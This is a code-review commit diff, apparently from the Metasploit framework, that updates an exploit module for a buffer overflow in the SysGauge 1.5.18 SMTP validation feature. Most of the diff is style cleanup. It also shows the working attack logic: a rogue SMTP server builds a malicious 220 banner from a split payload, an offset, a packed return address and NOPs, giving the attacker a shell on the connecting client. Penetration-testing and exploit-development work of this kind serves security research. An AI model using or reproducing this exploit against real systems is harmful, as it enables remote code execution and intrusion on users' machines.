Updated based on @wvu's comments

Author: Chiggins

modules/exploits/windows/smtp/sysgauge_client_bof.rb

@@ -1,4 +1,4 @@
-
+#
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 #
@@ -7,9 +7,6 @@
 #
 ##
 
-
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::TcpServer
 
@@ -19,14 +16,14 @@ def initialize()
     super(
       'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
       'Description'    => %q{
-        This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
+        This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
         via its SMTP server validation. The module sends a malicious response along in the
-        220 service ready response and exploits the client resulting in an unprivileged shell.
+        220 service ready response and exploits the client, resulting in an unprivileged shell.
       },
       'Author'         =>
       [
         'Chris Higgins', # msf Module -- @ch1gg1ns
-        'Peter Baris'
+        'Peter Baris'    # Initial discovery and PoC
       ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -40,7 +37,6 @@ def initialize()
       'Payload'        =>
       {
         'Space' => 306,
-        'Smallest' => true,
         'BadChars' => "\x00\x0a\x0d\x20"
       },
       'Platform'  => 'win',
@@ -53,32 +49,31 @@ def initialize()
           }
         ]
       ],
-      'Privileged'    => 'false',
+      'Privileged'    => false,
       'DisclosureDate' => 'Feb 28 2017',
       'DefaultTarget' => 0
       )
     register_options(
       [
       OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
-      ], self.class)
-  end
-
-  def setup
-    super
+      ])
   end
 
   def on_client_connect(c)
+    # Note here that the payload must be split into two parts.
+    # The payload gets jumbled in the stack so we need to split
+    # and align to get it to execute correctly.
     sploit =  "220 "
-    sploit += rand_text(target['Offset'])
+    sploit << rand_text(target['Offset'])
     # Can only use the last part starting from 232 bytes in
-    sploit += payload.encoded[232..-1]
-    sploit += rand_text(2)
-    sploit += [target.ret].pack('V')
-    sploit += rand_text(12)
-    sploit += make_nops(8)
+    sploit << payload.encoded[232..-1]
+    sploit << rand_text(2)
+    sploit << [target.ret].pack('V')
+    sploit << rand_text(12)
+    sploit << make_nops(8)
     # And the first part up to 232 bytes
-    sploit += payload.encoded[0..231]
-    sploit += "ESMTP Sendmail \r\n"
+    sploit << payload.encoded[0..231]
+    sploit << "ESMTP Sendmail \r\n"
 
     print_status("Client connected: " + c.peerhost)
     print_status("Sending payload...")